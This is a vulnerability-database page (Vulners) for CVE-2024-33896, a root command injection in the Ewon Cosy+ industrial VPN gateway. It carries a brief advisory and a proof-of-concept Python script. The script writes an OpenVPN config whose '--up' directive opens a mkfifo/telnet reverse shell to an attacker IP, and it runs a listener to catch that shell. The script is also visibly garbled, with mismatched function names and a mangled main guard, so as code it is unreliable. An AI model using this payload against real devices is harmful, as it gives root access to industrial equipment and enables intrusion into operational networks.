Vulners
Lucene search
📄 Cosy+ 21.2s7 Command Injection
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2024-33896 | 2 Aug 202420:42 | – | circl |
 | HMS Networks HMS Cosy+ 安全漏洞 | 2 Aug 202400:00 | – | cnnvd |
 | CVE-2024-33896 | 2 Aug 202400:00 | – | cve |
 | CVE-2024-33896 | 2 Aug 202400:00 | – | cvelist |
 | Cosy+ firmware 21.2s7 - Command Injection | 10 Apr 202500:00 | – | exploitdb |
 | EUVD-2024-31600 | 2 Aug 202400:00 | – | euvd |
 | CVE-2024-33896 | 2 Aug 202418:16 | – | nvd |
 | Ewon Cosy+ Command Injection | 19 Aug 202400:00 | – | packetstorm |
 | PT-2024-25533 · Cosy+ · Cosy+ | 2 Aug 202400:00 | – | ptsecurity |
 | CVE-2024-33896 | 23 May 202507:57 | – | redhatcve |
10
Hey,
Overview: The Ewon Cosy+ is a VPN gateway used for remote access and
maintenance in industrial environments. The manufacturer describes the
product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure
VPN connection between the machine (PLC, HMI, or other devices) and the
remote engineer. The connection happens through Talk2m, a highly secured
industrial cloud service. The Ewon Cosy+ makes industrial remote access
easy and secure like never before!" Due to improper neutralization of
parameters read from a user-controlled configuration file, an authenticated
attacker is able to inject and execute OS commands on the device.
Vulnerability Details: Authenticated attackers are able to upload a custom
OpenVPN configuration. This configuration can contain the OpenVPN
paramaters "--up" and "--down", which execute a specified script or
executable. Since the process itself runs with the highest privileges
(root), this allows the device to be completely compromised.
PoC:
# Exploit Title: Ewon Cosy+ Command Injection
# Google Dork: N/A
# Date: 2024-8-20
# Exploit Author: CodeB0ss
# Contact: t.me/codeb0ss / [email protected]
# Version: 21.2s7
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-33896
import socket
import subprocess
import time
def configcreator(file_path):
with open(file_path, 'w') as f: f.write( """ client dev tun persist-tun
proto tcp verb 5 mute 20 --up '/bin/sh -c "TF=$(mktemp -u);mkfifo
$TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"' script-security 2 """) def
l3st(port): server_socket = socket.socket(socket.AF_INET,
socket.SOCK_STREAM) server_socket.bind(('0.0.0.0', port))
server_socket.listen(1) print(f" - --> Listening_0n_port {port}")
client_socket, _ = server_socket.accept() print(" - --> Recevied") while
True: data = client_socket.recv(1024) if not data: break
print(data.decode()) client_socket.close() server_socket.close() if name ==
"main": IP = '127.0.0.1' config = '/path/to/malicious_config.ovpn' port =
5000 listener_process = subprocess.Popen(['python', '-c', f'from main
import start_listener; start_listener({port})']) time.sleep(2)
create_malicious_openvpn_config(config) print(f" - --> config_created
{config}")
GitHub:
https://github.com/codeb0ss/CVE-2024-33896-PoCData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Apr 2025 00:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.17.2
EPSS0.17138
SSVC